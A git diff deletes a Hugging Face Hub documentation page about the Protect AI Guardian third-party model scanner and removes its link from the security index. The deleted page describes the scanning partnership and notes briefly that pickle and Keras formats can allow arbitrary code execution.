diff --git a/docs/hub/security-protectai.md b/docs/hub/security-protectai.md
deleted file mode 100644
index 6d1dc092f..000000000
--- a/docs/hub/security-protectai.md
+++ /dev/null
@@ -1,27 +0,0 @@
-# Third-party scanner: Protect AI
-
-
-Interested in joining our security partnership / providing scanning information on the Hub? Please get in touch with us over at security@huggingface.co.*
-
-
-[Protect AI](https://protectai.com/)'s [Guardian](https://protectai.com/guardian) catches pickle, Keras, and other exploits as detailed on their [Knowledge Base page](https://protectai.com/insights/knowledge-base/). Guardian also benefits from reports sent in by their community of bounty [Huntr](https://huntr.com/)s.
-
-![Protect AI report for the danger.dat file contained in mcpotato/42-eicar-street](https://huggingface.co/datasets/huggingface/documentation-images/resolve/main/hub/protect-ai-report.png)
-*Example of a report for [danger.dat](https://huggingface.co/mcpotato/42-eicar-street/blob/main/danger.dat)*
-
-We partnered with Protect AI to provide scanning in order to make the Hub safer. The same way files are scanned by our internal scanning system, public repositories' files are scanned by Guardian.
-
-Our frontend has been redesigned specifically for this purpose, in order to accomodate for new scanners:
-
-
-
-Here is an example repository you can check out to see the feature in action: [mcpotato/42-eicar-street](https://huggingface.co/mcpotato/42-eicar-street).
-
-## Model security refresher
-
-To share models, we serialize the data structures we use to interact with the models, in order to facilitate storage and transport. Some serialization formats are vulnerable to nasty exploits, such as arbitrary code execution (looking at you pickle), making sharing models potentially dangerous.
-
-As Hugging Face has become a popular platform for model sharing, we’d like to protect the community from this, hence why we have developed tools like [picklescan](https://github.com/mmaitre314/picklescan) and why we integrate third party scanners.
-
-Pickle is not the only exploitable format out there, [see for reference](https://github.com/Azure/counterfit/wiki/Abusing-ML-model-file-formats-to-create-malware-on-AI-systems:-A-proof-of-concept) how one can exploit Keras Lambda layers to achieve arbitrary code execution.
-
diff --git a/docs/hub/security.md b/docs/hub/security.md
index a4190a6eb..a90e94a3c 100644
--- a/docs/hub/security.md
+++ b/docs/hub/security.md
@@ -20,5 +20,4 @@ For any other security questions, please feel free to send us an email at securi
- [Malware Scanning](./security-malware)
- [Pickle Scanning](./security-pickle)
- [Secrets Scanning](./security-secrets)
-- [Third-party scanner: Protect AI](./security-protectai)
- [Resource Groups](./security-resource-groups)